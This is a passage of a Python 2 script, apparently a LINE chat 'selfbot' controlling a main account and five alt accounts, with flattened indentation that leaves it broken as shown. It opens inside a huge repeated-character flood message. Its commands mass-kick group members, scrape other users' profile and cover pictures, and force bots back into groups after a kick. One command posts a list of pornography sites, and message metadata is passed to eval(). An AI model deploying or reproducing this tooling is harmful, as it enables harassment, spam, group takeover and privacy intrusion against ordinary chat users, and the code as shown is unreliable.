.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.
1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1\n\nMakasih Sudah Dilihat :)\nJangan Dikick ampun mzz :v")
elif ".music" in msg.text.lower():
songname = msg.text.lower().replace(".music","")
params = {"songname":" songname"}
r = requests.get('https://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
cl.sendMessage(msg.to, song[4])
elif ".Youtube " in msg.text:
query = msg.text.replace(".Youtube ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&List' not in a['href']:
cl.sendText(msg.to,'http://www.youtube.com' + a['href'] + a['title'])
elif "Block @" in msg.text:
if msg.toType == 2:
print "[block] OK"
_name = msg.text.replace("Block @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.blockContact(target)
cl.sendText(msg.to, "Success block contact~")
except Exception as e:
print e
elif msg.text.lower() == 'blocklist':
blockedlist = cl.getBlockedContactIds()
cl.sendText(msg.to, "Please wait...")
kontak = cl.getContacts(blockedlist)
num=1
msgs="User Blocked List\n"
for ids in kontak:
msgs+="\n%i. %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n\nTotal %i blocked user(s)" % len(kontak)
cl.sendText(msg.to, msgs)
elif "Steal cover @" in msg.text:
if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Steal cover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Midpict:" in msg.text:
if msg.from_ in admin:
umid = msg.text.replace("Midpict:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
elif "Steal pict " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("Steal pict ","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
except:
cl.sendText(msg.to,"Error!")
#===============================================
elif msg.text in ["Invite on","เชินเปิด"]:
if msg.from_ in admin:
wait["ricoinvite"] = True
random.choice(KAC).sendText(msg.to,"🌟เปิดเชิญด้วยคอนแทค🌟")
elif msg.text in ["Invite off","ปิดเชิน"]:
if msg.from_ in admin:
wait["ricoinvite"] = False
random.choice(KAC).sendText(msg.to,"🌟ปิดเชิญ🌟")
#===============================================
elif ("Cek " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendText(msg.to,"Mid:" + key1)
elif msg.text in ["Mid","ไอดี"]:
cl.sendText(msg.to, msg.from_)
elif msg.text in ["Link on","เปิดลิ้ง"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = False
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL open")
else:
cl.sendText(msg.to,"URL open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group ô€œô€„‰👈")
else:
cl.sendText(msg.to,"Can not be used for groups other than ô€œô€„‰")
elif msg.text in ["Link off","ปิดลิ้ง"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = True
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL close👈")
else:
cl.sendText(msg.to,"URL close👈")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group 👈")
else:
cl.sendText(msg.to,"Can not be used for groups other than ô€œ")
elif msg.text in ["url","Url"]:
if msg.toType == 2:
g = cl.getGroup(msg.to)
if g.preventJoinByTicket == True:
g.preventJoinByTicket = False
cl.updateGroup(g)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini tidak dapat digunakan di luar kelompok")
else:
cl.sendText(msg.to,"Tidak dapat digunakan untuk kelompok selain")
elif msg.text in ["Gurl","ลิ้ง"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["list"]:
gs = ki.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (ki.getGroup(i).name + " | [ " + str(len (ki.getGroup(i).members)) + " ]")
ki.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["S2glist"]:
gs = ki2.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (ki2.getGroup(i).name + " | [ " + str(len (ki2.getGroup(i).members)) + " ]")
ki2.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["S3glist"]:
gs = ki3.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (ki3.getGroup(i).name + " | [ " + str(len (ki3.getGroup(i).members)) + " ]")
ki3.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["S4glist"]:
gs = ki4.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (ki4.getGroup(i).name + " | [ " + str(len (ki4.getGroup(i).members)) + " ]")
ki4.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["S5glist"]:
gs = ki5.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[���] %s \n" % (ki5.getGroup(i).name + " | [ " + str(len (ki5.getGroup(i).members)) + " ]")
ki5.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text == "ลิ้ง":
ki.sendText(msg.to,"nekopoi.host")
ki.sendText(msg.to,"sexvideobokep.com")
ki.sendText(msg.to,"memek.com")
ki.sendText(msg.to,"pornktube.com")
ki.sendText(msg.to,"faketaxi.com")
ki.sendText(msg.to,"videojorok.com")
ki.sendText(msg.to,"watchmygf.mobi")
ki.sendText(msg.to,"xnxx.com")
ki.sendText(msg.to,"pornhd.com")
ki.sendText(msg.to,"xvideos.com")
ki.sendText(msg.to,"vidz7.com")
ki.sendText(msg.to,"m.xhamster.com")
ki.sendText(msg.to,"xxmovies.pro")
ki.sendText(msg.to,"youporn.com")
ki.sendText(msg.to,"pornhub.com")
ki.sendText(msg.to,"anyporn.com")
ki.sendText(msg.to,"hdsexdino.com")
ki.sendText(msg.to,"rubyourdick.com")
ki.sendText(msg.to,"anybunny.mobi")
ki.sendText(msg.to,"cliphunter.com")
ki.sendText(msg.to,"sexloving.net")
ki.sendText(msg.to,"free.goshow.tv")
ki.sendText(msg.to,"eporner.com")
ki.sendText(msg.to,"Pornhd.josex.net")
ki.sendText(msg.to,"m.hqporner.com")
ki.sendText(msg.to,"m.spankbang.com")
ki.sendText(msg.to,"m.4tube.com")
ki.sendText(msg.to,"brazzers.com")
#-----------------------------------------------------------
elif "#leave" in msg.text:
import sys
sys.exit()
#-----------------------------------------------------------
elif "Speed" in msg.text:
start = time.time()
cl.sendText(msg.to, "ᴘʀᴏɢʀᴇss...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
ki.sendText(msg.to, "%sseconds" % (elapsed_time))
ki2.sendText(msg.to, "%sseconds" % (elapsed_time))
ki3.sendText(msg.to, "%sseconds" % (elapsed_time))
ki4.sendText(msg.to, "%sseconds" % (elapsed_time))
ki5.sendText(msg.to, "%sseconds" % (elapsed_time))
#-----------------------------------------------
elif "Sp" in msg.text:
start = time.time()
cl.sendText(msg.to, "ᴘʀᴏɢʀᴇss...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
#-----------------------------------------------
elif msg.text.lower() == 'respons':
profile = ki.getProfile()
text = profile.displayName
ki.sendText(msg.to, text)
profile = ki2.getProfile()
text = profile.displayName
ki2.sendText(msg.to, text)
profile = ki3.getProfile()
text = profile.displayName
ki3.sendText(msg.to, text)
profile = ki4.getProfile()
text = profile.displayName
ki4.sendText(msg.to, text)
profile = ki5.getProfile()
text = profile.displayName
ki5.sendText(msg.to, text)
#------------------------------------------------------------------
elif "Steal home @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Steal home @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
#------------------------------------------------------------------
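# Blacklist management: "Ban @x" / "Unban @x" work on mentions, "Ban:<name>" / "Unban:<name>"
# match display names. The blacklist lives in wait["blacklist"] and is persisted to
# st2__b.json; the "kill" command further down kicks every blacklisted member found in the group.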
elif ("Ban " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Banned")
except:
pass
elif "Unban @" in msg.text:
if msg.toType == 2:
print "[Unban]ok"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip()
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Unlocked")
except:
cl.sendText(msg.to,"Error")
elif "Ban:" in msg.text:
nk0 = msg.text.replace("Ban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Locked")
except:
cl.sendText(msg.to,"Error")
elif "Unban:" in msg.text:
nk0 = msg.text.replace("Unban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Unlocked")
except:
cl.sendText(msg.to,"Error")
elif msg.text == 'Banlist':
if msg.from_ in admin:
if wait["blacklist"] == {}:
cl.sendText(msg.to," Nothing in the blacklist")
else:
cl.sendText(msg.to," following is a blacklist")
mc = ""
for mi_d in wait["blacklist"]:
mc += "�" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text.lower() == 'banlist':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += "�" +cl.getContact(mm).displayName + "\n"
cl.sendText(msg.to,cocoa + "Daftar Hitam")
elif msg.text in ["cb","���้างดำ"]:
if msg.from_ in admin:
wait["blacklist"] = {}
cl.sendText(msg.to,"clear")
elif msg.text in [" Ban","ดำ"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Unban","ขาว"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Banlist","เชคดำ"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Nothing double thumbs up")
else:
cl.sendText(msg.to,"Daftar Banlist")
mc = "[⎈]Blacklist [⎈]\n"
for mi_d in wait["blacklist"]:
mc += "[✗] " + cl.getContact(mi_d).displayName + " \n"
cl.sendText(msg.to, mc + "")
elif msg.text in ["Ban cek","Cekban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = "[⎈]Mid Blacklist [⎈]"
for mm in matched_list:
cocoa += "\n" + mm + "\n"
cl.sendText(msg.to,cocoa + "")
elif msg.text.lower() == 'kill':
if msg.from_ in admin:
if msg.toType == 2:
group = ki.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
ki.sendText(msg.to,"Tidak ada Daftar Blacklist")
return
for jj in matched_list:
try:
cl.kickoutFromGroup(msg.to,[jj])
ki.kickoutFromGroup(msg.to,[jj])
ki2.kickoutFromGroup(msg.to,[jj])
ki3.kickoutFromGroup(msg.to,[jj])
ki4.kickoutFromGroup(msg.to,[jj])
ki5.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
elif "Nuke" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Nuke","")
gs = cl.getGroup(msg.to)
cl.sendText(msg.to,"Masih Mauko Sundala")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Tidak ada Member")
ki.sendText(msg.to,"Nothing Bosqu")
else:
for target in targets:
if not target in Bots:
try:
klist=[cl]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[target])
except:
ki.sendText(msg,to,"Hahaha")
ki.sendText(msg,to,"Fakyu Sundala")
#-----------------------------------------------
#-----------------------------------------------
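# The join helpers below all follow the same pattern: temporarily disable
# preventJoinByTicket on the group, reissue a group ticket, let the alt accounts
# (ki..ki5) join via acceptGroupInvitationByTicket, then lock the group again.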
elif "Kicker" in msg.text:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ti)
ki2.acceptGroupInvitationByTicket(msg.to,Ti)
ki3.acceptGroupInvitationByTicket(msg.to,Ti)
ki4.acceptGroupInvitationByTicket(msg.to,Ti)
ki5.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
#-----------------------------------------------
elif msg.text in ["Sayang","Kuy","All join","Minna"]:
if msg.from_ in admsa:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
elif msg.text.lower() == 'spcome':
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
#-----------------------------------------------
elif "As1 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
print "kicker ok"
#-----------------------------------------------
elif "As2 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kicker ok"
#-----------------------------------------------
elif "As3 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki2.updateGroup(G)
print "kicker ok"
#-----------------------------------------------
elif "As4 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki3.updateGroup(G)
print "kicker ok"
#-----------------------------------------------
elif "As5 in" in msg.text:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki5.updateGroup(G)
print "kicker ok"
#-----------------------------------------------
elif msg.text in ["คิกออก","Bye","กุเกลียดมึง","Sayonara"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.sendText(msg.to,"ไปก็ได้ บ๊ายบาย " + str(ginfo.name) + "")
ki.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
ki3.leaveGroup(msg.to)
ki4.leaveGroup(msg.to)
ki5.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As1 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As2 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki2.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As3 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki3.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As4 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki4.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif "As5 bye" in msg.text:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki5.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif msg.text in ["Welcome","wc on","welcome","Wc"]:
ginfo = cl.getGroup(msg.to)
wait["wc"] = True
cl.sendText(msg.to,"ยินดีต้อนรับสู่กลุ่ม " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
elif msg.text in ["Welcome","wc off","welcome","Wc"]:
ginfo = cl.getGroup(msg.to)
wait["wc"] = False
cl.sendText(msg.to,"ยินดีต้อนรับสู่กลุ่ม " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
#-----------------------------------------------
#-----------------------------------------------
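# From here on the handler reacts to raw operations rather than text commands.
# op.type 19 appears to be the "member kicked from group" notification: when one of the
# bot accounts gets kicked, another account kicks the offender, reopens the group ticket,
# lets every account rejoin via a fresh ticket, closes the ticket again and (in the first
# branch) blacklists the kicker. The op.type meanings are assumptions based on the usual
# LINE OpType enum values.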
if op.type == 19:
try:
if op.param3 in mid:
if op.param2 in kimid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
else:
G = ki.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
ki.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in kimid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = ki2.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
elif op.param3 in ki3mid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
